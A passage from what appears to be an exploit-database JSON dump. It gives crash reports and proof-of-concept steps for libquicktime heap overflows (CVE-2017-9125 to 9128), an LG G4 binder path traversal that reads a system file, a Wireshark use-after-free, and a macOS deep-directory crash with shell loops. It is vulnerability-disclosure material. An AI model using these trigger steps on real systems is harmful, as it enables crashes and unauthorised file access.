0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n \r\n \r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n \r\n \r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n \r\n \r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n \r\n \r\n \r\n \r\n=================================\r\n \r\n \r\nqflb.wu () dbappsecurity com cn\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\n\n# 0day.today [2018-02-27] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27921"}, {"lastseen": "2018-01-09T03:21:54", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category dos / poc", "modified": "2017-02-14T00:00:00", "published": "2017-02-14T00:00:00", "href": "https://0day.today/exploit/description/27006", "id": "1337DAY-ID-27006", "type": "zdt", "title": "LG G4 - lghashstorageserver Directory Traversal Vulnerability", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987\r\n \r\nThe lghashstorageserver binder service (/system/bin/lghashstorageserver) \r\nimplementation on the LG G4 is vulnerable to path traversal, allowing an\r\napp to read and write 0x20 bytes from any file in the context of the\r\nlghashstorageserver.\r\n \r\nSee attached for a PoC which reads from /proc/self/attr/current for the \r\nlghashstorageserver.\r\n \r\n[0] opening /dev/binder\r\n[0] looking up service lghashstorage\r\n0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .\r\n0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .\r\n0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .\r\n0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .\r\n0064: 0d . 00 . 00 . 00 . 6c l 00 . 67 g 00 . 68 h 00 . 61 a 00 . 73 s 00 . 68 h 00 .\r\n0080: 73 s 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 . 00 . 00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 24 offs 8\r\n0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .\r\n0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .\r\n - type 73682a85 flags 0000017f ptr 0000005500000001 cookie 0000000000000000\r\n[0] got handle 00000001\r\n[0] reading hash\r\n0000: 00 . 01 . 00 . 00 . 1b . 00 . 00 . 00 . 63 c 00 . 6f o 00 . 6d m 00 . 2e . 00 .\r\n0016: 6c l 00 . 67 g 00 . 65 e 00 . 2e . 00 . 49 I 00 . 48 H 00 . 61 a 00 . 73 s 00 .\r\n0032: 68 h 00 . 53 S 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 .\r\n0048: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .\r\n0064: 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e .\r\n0080: 2e . 2f / 2e . 2e . 2f / 70 p 72 r 6f o 63 c 2f / 73 s 65 e 6c l 66 f 2f / 61 a\r\n0096: 74 t 74 t 72 r 2f / 63 c 75 u 72 r 72 r 65 e 6e n 74 t 00 . 00 . 00 . 00 . 00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 36 offs 0\r\n0000: 75 u 3a : 72 r 3a : 6c l 67 g 68 h 61 a 73 s 68 h 73 s 74 t 6f o 72 r 61 a 67 g\r\n0016: 65 e 73 s 65 e 72 r 76 v 65 e 72 r 3a : 73 s 30 0 00 . 00 . 00 . 00 . 00 . 00 .\r\n0032: 00 . 00 . 00 . 00 .\r\nu:r:lghashstorageserver:s0\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/27006", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-06T03:39:17", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "href": "https://0day.today/exploit/description/25853", "id": "1337DAY-ID-25853", "title": "Wireshark - print_hex_data_buffer / print_packet Use-After-Free", "type": "zdt", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=651\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68\r\nREAD of size 1 at 0x6070000003a0 thread T0\r\n #0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13\r\n #1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14\r\n #2 0x5422e2 in print_packet wireshark/tshark.c:4155:10\r\n #3 0x53cb2e in process_packet wireshark/tshark.c:3742:7\r\n #4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #5 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\n0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)\r\nfreed by thread T0 here:\r\n #0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3\r\n #2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3\r\n #3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3\r\n #4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2\r\n #5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4\r\n #6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5\r\n #7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #18 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #20 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #22 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2\r\n #3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6\r\n #4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #15 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #17 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #19 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer\r\nShadow bytes around the buggy address:\r\n 0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd\r\n 0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd\r\n=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa\r\n 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa\r\n 0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd\r\n 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd\r\n 0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00\r\n 0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==14146==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25853"}, {"lastseen": "2018-04-09T03:40:05", "bulletinFamily": "exploit", "description": "Mac OS X version 10.11 suffered from an FTS deep structure of the file system buffer overflow vulnerability.", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "id": "1337DAY-ID-24685", "href": "https://0day.today/exploit/description/24685", "type": "zdt", "title": "Mac OS X 10.11 FTS Deep Structure of the File System Buffer Overflow Exploit", "sourceData": "MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow\r\nCredit: Maksymilian Arciemowicz ( CXSECURITY )\r\nWebsite: \r\nhttp://cxsecurity.com/\r\nhttp://cert.cx/\r\n\r\n\r\nAffected software:\r\n- MACOS's Commands such as: ls, find, rm \r\n- iPhone 4s and later,\r\n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes\r\n- Apple TV (4th generation)\r\n- probably more\r\n\r\nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting.\r\n \r\nPoC:\r\nCreate an direcotry and perform the following actions:\r\n\r\n\r\n# for i in {1..1024}; do mkdir B && cd B; done\r\n...\r\ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory\r\n\r\n\r\nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g.\r\n\r\n\r\n# for i in {1..1024}; do cd .. ; done\r\n\r\n\r\nThen you can perform recursive 'ls' command. Let's run it ten times:\r\n\r\n\r\n# for i in {1..10}; do ls -laR > /dev/null; done\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\n\r\n\r\ncrash randometly. Let's see valgrind and lldb \r\n\r\n\r\nLLDB:\r\n...\r\n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n\r\n./B/B/B/B/B/B/B/B/..../B/B:\r\nProcess 987 stopped\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\nlibsystem_c.dylib`strlen:\r\n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0\r\n 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, 